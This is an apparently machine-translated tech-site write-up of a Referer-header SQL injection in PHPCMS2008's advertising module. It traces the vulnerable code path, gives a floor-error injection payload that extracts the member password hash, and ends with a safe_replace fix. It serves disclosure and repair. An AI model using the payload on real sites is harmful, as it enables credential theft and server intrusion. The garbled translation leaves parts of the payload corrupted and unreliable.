Shulou(Shulou.com)06/03 Report--

Editor to share with you the PHPCMS2008 advertising template SQL injection vulnerability repair example analysis, I hope you will learn something after reading this article, let's discuss it together!

00 vulnerability description

PHPCMS2008 due to the advertising module referer is not strict, resulting in a sql injection vulnerability. The administrator user name and password can be obtained, and after logging into the background, the attacker may obtain the webshell and further infiltrate the server.

01 vulnerability analysis

Location of the vulnerability:

/ ads/include/ads_place.class.php in the show method.

Function show ($placeid)... if ($adses [0] ['option']) {foreach ($adses as $ads) {$contents [] = ads_content ($ads, 1); $this- > db- > query ("INSERT INTO$this- > stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES (' $ads[ adsid]','$username','$ip','$this- > referrer','$time','0')"); $template = $ads ['template']? $ads [' template']: 'ads';}}.

In the sql statement

$this- > db- > query ("INSERT INTO$this- > stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads [adsid]','$_ username','$ip','$this- > referrer','$time','0')")

Here $this- > referrer inserts the referer field in the HTTP request header directly into the database through the this method without any filtering. This this method is encapsulated directly in PHPCMS.

So now that the loophole has been found, the next step is to find a user-controlled page that contains the vulnerability. If the vulnerability is beyond the control of the user, for example, it can only be exploited by the administrator, then it is quite a chicken rib.

The backtracking method is used here to see which pages have called it.

Page / ads/include/commom.inc.php

Look up to see who called / ads/include/commom.inc.php

/ ads/ad.php file

Ad.php files are user-controllable files, but sometimes ad.php cannot access them. Continue to look up / data/js.php.

When the user visits the home page, js.php is called, through which harmful fields can be submitted, and then through layer-by-layer invocation, the field referer is passed into the dangerous method show, introducing a SQL injection attack.

02 vulnerability exploitation

There are many ways to modify the referer field in the request header, such as burpsuite,Tamper Data.

Here, you directly use Firefox's Tamper Data to modify:

Click Start Tamper and visit http://your-addr/data/js.php?id=1

At this point, Tamper Data will pop up, right-click in the right box, and add an Element value to fill in payload.

Referer=1', (SELECT 1 FROM (select count (*), concat (floor (rand (0) * 2), char (45 mine45), (SELECT password from phpcms_member limit 1)) a from information_schema.tables group by a) b),'0') #

Let me explain here: because the sql statement of the vulnerability is INSERT is not echoed, blind injection can be used, and the payload here uses floor error injection. For the principle of floor error injection, please refer to: floor function usage

Bringing this payload into the sql statement is:

$this- > db- > query ("INSERT INTO$this- > stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ads[ adsid]','$_ username','$ip','1','$time', (SELECT 1 FROM (select count (*), concat (rand (0) * 2), char (45pm 45), (SELECT password from phpcms_member limit 1) a from information_schema.tables group by a) b),'0') #,'0')

03 vulnerability repair

Filter the relevant fields.

$referer = safe_replace ($this- > referer); $this- > db- > query ("INSERT INTO $this- > stat_table (`adsid`, `username`, `ip`, `referer`, `clicktime`, `type`) VALUES ('$ADS [adsid]','$_ username','$ip','$referer','$time','0'); $template = $ads ['template']? $ads [' template']: 'ads'

Where safe_replace is the filtering function encapsulated by PHPCMS2008.

After reading this article, I believe you have a certain understanding of the "sample Analysis of SQL injection vulnerability repair in PHPCMS2008 Advertising template". If you want to know more about it, welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.